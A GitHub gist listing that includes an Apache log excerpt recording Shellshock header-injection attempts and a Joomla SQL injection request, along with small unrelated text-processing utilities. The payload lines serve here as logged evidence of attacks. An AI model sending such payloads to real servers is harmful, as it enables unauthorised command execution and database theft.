Skip to content

Instantly share code, notes, and snippets.

View brendano's full-sized avatar

Brendan O'Connor brendano

283 followers · 4 following
View GitHub Profile
@brendano
brendano / gist:38302ee92645e3a16dbd
Created October 12, 2014 19:05
Shellshock attack attempts I noticed in apache logs, from grep '()' ... the shellshock-scan one I think I initiated but I think the rest are attack attempts.
209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-"
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
114.91.105.103 - -
@brendano
brendano / -
Created October 27, 2014 21:16
tw2created_at_iso.py
#!/usr/bin/env python
import ujson as json
import time,sys
from datetime import datetime
def parse_date(twitter_lame_datetime_string):
# e.g. the 'created_at' field
ts = time.strptime(twitter_lame_datetime_string, "%a %b %d %H:%M:%S +0000 %Y")
return datetime(*ts[:7])
@brendano
brendano / geo_filter.py
Last active August 29, 2015 14:08
#!/usr/bin/env python
import sys,os,re,json
from hose_util import iterate, lookup
# import geodb
# country_db = geodb.GeoDB.load_geojson_files(['/home/brenocon/geocode/tm_world_borders-0.3.json'])
OneCoord = r'([-+]?\d{1,3}\.\d{3,})'
Separator= r', ?'
LatLong = re.compile(OneCoord + Separator + OneCoord, re.U)
@brendano
brendano / lowrank_viz.ipynb
Created May 27, 2015 04:35
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@brendano
brendano / jsontidy
Created August 12, 2008 00:20
jsontidy
#!/usr/bin/env ruby
# jsontidy
# POSSIBLE USAGE
# [[Shell]] cat data.json | jsontidy
# [[TextMate]] Cmd-A Cmd-Opt-R jsontidy
# [[Vim] :%!jsontidy
# alternate implementation: python -m simplejson.tool
@brendano
brendano / htmlunescape.pl
Created August 14, 2008 02:13
htmlunescape
#!/usr/bin/env perl
while(<>) {
s/&lt;/</g;
s/&gt;/>/g;
s/&amp;/&/g;
print $_;
}
@brendano
brendano / imageopen.rb
Created August 14, 2008 02:09
imageopen - mac commandline
#!/usr/bin/env ruby
# imageopen - # for mac, commandline open an image file without needing an extension, recognition via imagemagick
# brenocon@gmail.com (brendan o'connor)
require 'fileutils'
f = ARGV[0]
type = %x[identify #{f}].split[1].downcase
@brendano
brendano / htmlescape.pl
Created August 14, 2008 02:12
htmlescape
#!/usr/bin/env perl
while (<>) {
s/&/&amp;/g;
s/</&lt;/g;
s/>/&gt;/g;
print $_;
}
@brendano
brendano / pskill
Created August 14, 2008 08:38
pskill
#!/usr/bin/env ruby
# USAGE: ps wwaux | grep badprocess | pskill
# Like awk '{print $2}' | xargs kill, except somewhat smarter
class Array
def map_if(&b)
map(&b).select{|x| x}
end
end
@brendano
brendano / mycgi.rb
Created August 16, 2008 00:25
mycgi
require 'cgi'
# trying to make cgi.rb suck a tad bit less.
# the main thing I care about is clean, error-free parameter input.
# brendan o'connor (brenocon@gmail.com)
class MyCGI < CGI
def initialize
super("html3")
@converted_opts = {}
end